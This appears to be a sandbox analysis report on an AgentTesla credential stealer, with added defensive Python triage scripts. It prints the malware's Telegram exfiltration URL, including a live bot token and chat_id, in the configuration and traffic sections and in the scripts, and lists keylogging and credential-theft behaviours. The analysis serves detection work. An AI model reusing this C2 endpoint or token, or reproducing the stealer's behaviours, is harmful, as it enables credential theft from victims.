
Windows Analysis Report
PSFBGrvmxy.exe

Overview

General Information

Sample Name: PSFBGrvmxy.exe
Original Sample Name: c4b59f8e80a1289b9202a33da41d7d94.exe
Analysis ID: 830847
MD5: c4b59f8e80a1289b9202a33da41d7d94
SHA1: 9e50bc56372bd9f6c8cccf4c284bc373fde319f0
SHA256: 66d51327bab933eda9d755eb691e584fcb324b04c573d1be50d634c7297134f8
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign process
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • PSFBGrvmxy.exe (PID: 4916 cmdline: C:\Users\user\Desktop\PSFBGrvmxy.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 4692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PSFBGrvmxy.exe (PID: 5908 cmdline: C:\Users\user\Desktop\PSFBGrvmxy.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • Vlrvln.exe (PID: 1368 cmdline: "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Vlrvln.exe (PID: 5680 cmdline: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • Vlrvln.exe (PID: 5684 cmdline: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • kDPmkTm.exe (PID: 6016 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 4844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kDPmkTm.exe (PID: 4192 cmdline: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • Vlrvln.exe (PID: 1592 cmdline: "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 4664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kDPmkTm.exe (PID: 4864 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
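As an added example (not part of the Joe Sandbox report and not Joe Sandbox code), the following Python parses an abridged copy of the process tree above, decodes the -ENC argument handed to powershell.exe (PowerShell's -EncodedCommand is base64 over UTF-16LE text), and flags the two behaviours the tree makes visible without any other telemetry: copies of the sample (same MD5) executing from AppData\Roaming, and a child that re-executes the sample's own image, which is the pattern behind the report's "Creates a process in suspended mode" signature. The tree lines are copied from the report; the regular expressions, the Proc structure and the triage function are my own and assume the report's bullet-and-indent layout.

```python
"""Process-tree triage for Joe Sandbox analysis 830847 (added example, not Joe Sandbox code)."""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Abridged process-tree lines copied from the report; indentation encodes parent/child nesting.
PROCESS_TREE = r"""
  • PSFBGrvmxy.exe (PID: 4916 cmdline: C:\Users\user\Desktop\PSFBGrvmxy.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 4692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PSFBGrvmxy.exe (PID: 5908 cmdline: C:\Users\user\Desktop\PSFBGrvmxy.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • Vlrvln.exe (PID: 1368 cmdline: "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • kDPmkTm.exe (PID: 6016 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
"""

# One tree entry: "<indent>• image (PID: n cmdline: ... MD5: hex)". The cmdline group is greedy,
# so it stops at the last " MD5: " on the line.
LINE_RE = re.compile(
    r"^(?P<indent> *)• (?P<image>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)$"
)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...), case-insensitively.
ENC_RE = re.compile(
    r"(?i)(?<!\S)-e(?:c|n|nc|nco|ncod|ncode|ncoded|ncodedc|ncodedco|ncodedcom|ncodedcomm|ncodedcomma|ncodedcomman|ncodedcommand)?\s+([A-Za-z0-9+/=]+)"
)
APPDATA_RE = re.compile(r"(?i)\\AppData\\Roaming\\")


@dataclass
class Proc:
    image: str
    pid: int
    cmdline: str
    md5: str
    parent: Optional["Proc"] = None
    children: List["Proc"] = field(default_factory=list)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le").rstrip("\x00")
    except (binascii.Error, UnicodeDecodeError):
        return None  # -e... was some other switch, or the payload is not base64/UTF-16


def parse_tree(text: str) -> List[Proc]:
    """Parse the indented bullet list into linked Proc objects, returned in document order."""
    procs: List[Proc] = []
    stack: List[tuple] = []  # (indent width, Proc) of the current ancestor chain
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        p = Proc(m["image"], int(m["pid"]), m["cmd"], m["md5"].upper())
        depth = len(m["indent"])
        while stack and stack[-1][0] >= depth:
            stack.pop()
        if stack:
            p.parent = stack[-1][1]
            p.parent.children.append(p)
        stack.append((depth, p))
        procs.append(p)
    return procs


def triage(text: str) -> List[str]:
    """Flag encoded PowerShell, AppData self-copies and self re-execution from the tree alone."""
    procs = parse_tree(text)
    sample_md5 = procs[0].md5  # the submitted sample is the first root of the tree
    findings: List[str] = []
    for p in procs:
        decoded = decode_encoded_command(p.cmdline)
        if decoded is not None:
            findings.append(f"pid {p.pid}: encoded PowerShell -> {decoded!r}")
        if p.md5 == sample_md5 and APPDATA_RE.search(p.cmdline):
            findings.append(f"pid {p.pid}: sample copy ({p.image}) running from AppData\\Roaming")
        if p.parent and p.parent.md5 == p.md5 and p.parent.cmdline.strip('"') == p.cmdline.strip('"'):
            findings.append(f"pid {p.pid}: re-executes its own image (parent pid {p.parent.pid})")
    return findings


if __name__ == "__main__":
    for finding in triage(PROCESS_TREE):
        print(finding)
```

The decoded command is only "start-sleep -seconds 20", a delay before the second-stage work, which is why the report lists it under evasion rather than as a payload; the same decoder applies to any -EncodedCommand seen in process-creation telemetry (Sysmon event 1 or 4688 with command-line auditing).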

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
AgentTesla: {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}

Yara matches (memory dumps)

Source | Rule | Description | Author
0000000F.00000002.578941562.000000000306D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000015.00000002.620853028.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000003.00000002.621406129.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: PSFBGrvmxy.exe PID: 5908 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(7 entries in the full report; 5 shown here)

Yara matches (unpacked PEs)

Source | Rule | Description | Author
0.2.PSFBGrvmxy.exe.57b0000.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.3.PSFBGrvmxy.exe.4397550.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
                No Sigma rule has matched

Snort alerts

Timestamp: 03/20/23-18:32:31.325548 | Source: 192.168.2.4:49697 | Destination: 149.154.167.220:443 | Protocol: TCP | SID: 2851779 | Classtype: A Network Trojan was detected
Timestamp: 03/20/23-18:33:56.107393 | Source: 192.168.2.4:49700 | Destination: 149.154.167.220:443 | Protocol: TCP | SID: 2851779 | Classtype: A Network Trojan was detected
Timestamp: 03/20/23-18:34:27.218517 | Source: 192.168.2.4:49702 | Destination: 149.154.167.220:443 | Protocol: TCP | SID: 2851779 | Classtype: A Network Trojan was detected


                AV Detection

Source: PSFBGrvmxy.exe | ReversingLabs: Detection: 66%
Source: PSFBGrvmxy.exe | VirusTotal: Detection: 57%
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | ReversingLabs: Detection: 66%
Source: PSFBGrvmxy.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Joe Sandbox ML: detected
Source: 15.2.Vlrvln.exe.400000.0.unpack | Malware Configuration Extractor: AgentTesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Source: kDPmkTm.exe.4192.21.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
Source: PSFBGrvmxy.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2
Source: PSFBGrvmxy.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb | source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 | source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp

                Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49697 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49700 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49702 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org (3 queries)
Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | DNS query: name: api.ipify.org (6 queries)
Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | DNS query: name: api.ipify.org (6 queries)
Source: unknown | DNS query: name: api.ipify.org (12 queries)
Source: Yara match | File source: 0.2.PSFBGrvmxy.exe.57b0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.PSFBGrvmxy.exe.4397550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8db29b7328c749b | Host: api.telegram.org | Content-Length: 972 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8db29826727ee57 | Host: api.telegram.org | Content-Length: 972 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8db2971bc1af64d | Host: api.telegram.org | Content-Length: 972 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 64.185.227.155
Source: Joe Sandbox View | IP Address: 64.185.227.155
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
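Added example (not from the report and not Joe Sandbox code): triage of the captured HTTP requests and of the extracted Telegram configuration. The report prints each request's header lines run together, so the two requests below are reconstructed from the same values with CRLF separators reinserted; the parser, the token-masking and the three checks are my own and correspond to the report's signatures "HTTP GET or POST without a user agent", "Uses the Telegram API (likely for C&C communication)" and "May check the online IP address of the machine". The secret half of the bot token is masked in the findings so that it does not spread into tickets and logs; the numeric bot id is kept because it is what you pivot on across samples.

```python
"""HTTP-request and C2-config triage for Joe Sandbox analysis 830847 (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Requests reconstructed from the report's "HTTP traffic detected" entries (values unchanged,
# CRLF separators reinserted; bodies were not captured and are omitted).
REQUESTS = [
    "POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=---------------------------8db29b7328c749b\r\n"
    "Host: api.telegram.org\r\n"
    "Content-Length: 972\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\n"
    "Host: api.ipify.org\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]

# Configuration URLs exactly as the report's Malware Configuration Extractor printed them.
CONFIG_URLS = [
    "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage",
    "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705",
]

# Bot API paths have the form /bot<bot id>:<secret>/<method>; the secret is what grants access.
BOT_PATH_RE = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)")


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)  # header names lower-cased


def parse_request(raw: str) -> Request:
    """Minimal HTTP/1.1 request-head parser: request line plus headers, body ignored."""
    head, _, _body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    req = Request(method, path)
    for line in header_lines:
        name, _, value = line.partition(":")
        req.headers[name.strip().lower()] = value.strip()
    return req


def mask_bot_token(path: str) -> str:
    """Keep the numeric bot id (useful for pivoting) but hide the secret half of the token."""
    return BOT_PATH_RE.sub(lambda m: f"/bot{m['bot_id']}:****/{m['method']}", path)


def triage_requests(raws: List[str]) -> List[str]:
    """Apply three of the report's signatures to raw requests; returns human-readable findings."""
    findings: List[str] = []
    for raw in raws:
        req = parse_request(raw)
        host = req.headers.get("host", "")
        label = f"{req.method} {host}{mask_bot_token(req.path.split('?', 1)[0])}"
        if "user-agent" not in req.headers:  # "HTTP GET or POST without a user agent"
            findings.append(f"{label}: no User-Agent header")
        m = BOT_PATH_RE.match(req.path)
        if host == "api.telegram.org" and m:  # "Uses the Telegram API (likely for C&C communication)"
            findings.append(f"{label}: Telegram Bot API {m['method']} via bot {m['bot_id']} (exfiltration channel)")
        if host == "api.ipify.org":  # "May check the online IP address of the machine"
            findings.append(f"{label}: external IP lookup")
    return findings


def extract_telegram_config(url: str) -> Dict[str, Optional[str]]:
    """Pull bot id, secret, API method and chat_id out of an extracted Telegram C2 URL."""
    parts = urlsplit(url)
    m = BOT_PATH_RE.match(parts.path)
    if parts.hostname != "api.telegram.org" or not m:
        return {}
    chat_id = parse_qs(parts.query).get("chat_id", [None])[0]
    return {"bot_id": m["bot_id"], "secret": m["secret"], "method": m["method"], "chat_id": chat_id}


if __name__ == "__main__":
    for finding in triage_requests(REQUESTS):
        print(finding)
    for url in CONFIG_URLS:
        print(extract_telegram_config(url))
```

Two things worth noting from the output. The exfiltration POST carries no User-Agent at all while the ipify lookup spoofs Firefox 99, so a proxy rule keyed on "missing User-Agent to api.telegram.org" catches the part that matters even though TLS hides the path on the wire. And the chat_id in the AgentTesla configuration is the destination the stolen data is delivered to; together with the bot id it identifies the operator's Telegram account, which is the artefact to report to Telegram and to match against other samples.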
Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/
Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCert
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.607404091.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.639278801.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003322000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
